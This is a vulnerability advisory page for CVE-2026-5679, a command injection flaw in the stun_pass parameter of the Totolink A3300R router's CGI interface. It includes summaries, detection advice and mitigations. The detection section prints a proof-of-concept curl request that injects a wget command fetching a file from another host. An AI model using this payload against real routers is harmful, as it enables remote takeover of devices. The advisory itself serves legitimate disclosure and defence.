CVE-2026-5679
Received Received - Intake
OS Command Injection in Totolink A3300R vsetTr069Cfg Function

Publication date: 2026-04-06

Last updated on: 2026-04-29

Assigner: VulDB

Description
A security vulnerability has been detected in Totolink A3300R 17.0.0cu.557_B20221024. The impacted element is the function vsetTr069Cfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument stun_pass leads to os command injection. The exploit has been disclosed publicly and may be used.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-04-06
Last Modified
2026-04-29
Generated
2026-06-16
AI Q&A
2026-04-06
EPSS Evaluated
2026-06-15
NVD
CVE-2026-5679
EUVD
EUVD-2026-19464
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
totolink a3300r 17.0.0cu.557_b20221024
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Executive Summary

CVE-2026-5679 is a command injection vulnerability in the Totolink A3300R router firmware version 17.0.0cu.557_B20221024. It exists in the function vsetTr069Cfg within the /cgi-bin/cstecgi.cgi file. The vulnerability occurs because the parameter "stun_pass" from incoming requests is unsafely concatenated into a command string and executed by the router's system function. An attacker can send a specially crafted POST request with malicious shell commands in the "stun_pass" parameter, which the router executes, allowing arbitrary command execution.

This means an attacker can run any command on the router with the privileges of the web service, potentially leading to full device compromise.

Impact Analysis

This vulnerability can allow an attacker to execute arbitrary commands on the affected router remotely. This can lead to full compromise of the device, including unauthorized access, control over network traffic, installation of malicious software, or use of the router as a pivot point for further attacks within the network.

Detection Guidance

This vulnerability can be detected by monitoring for suspicious POST requests sent to the endpoint /cgi-bin/cstecgi.cgi containing the parameter "stun_pass" with unusual or suspicious values that may include shell command injections.

A practical detection method is to capture and analyze HTTP POST traffic targeting /cgi-bin/cstecgi.cgi and inspect the "stun_pass" parameter for injected commands or unexpected payloads.

For example, you can use the following curl command to test if the device is vulnerable by sending a crafted POST request with a suspicious "stun_pass" value:

  • curl -X POST http://[router_ip]/cgi-bin/cstecgi.cgi -H "Content-Type: application/json" -d '{"stun_pass":"4343$(wget 192.168.6.1:8888/testpoc)"}'

Additionally, network intrusion detection systems (NIDS) can be configured to alert on POST requests to /cgi-bin/cstecgi.cgi containing the "stun_pass" parameter with suspicious shell command patterns.

Mitigation Strategies

Immediate mitigation steps include restricting access to the vulnerable endpoint /cgi-bin/cstecgi.cgi to trusted networks or IP addresses only, to prevent unauthorized exploitation.

If possible, disable or block POST requests to /cgi-bin/cstecgi.cgi until a patch or firmware update is applied.

Monitor network traffic for suspicious POST requests containing the "stun_pass" parameter and block or alert on such attempts.

Contact the vendor or check for firmware updates that address this vulnerability and apply them as soon as they become available.

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-5679. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart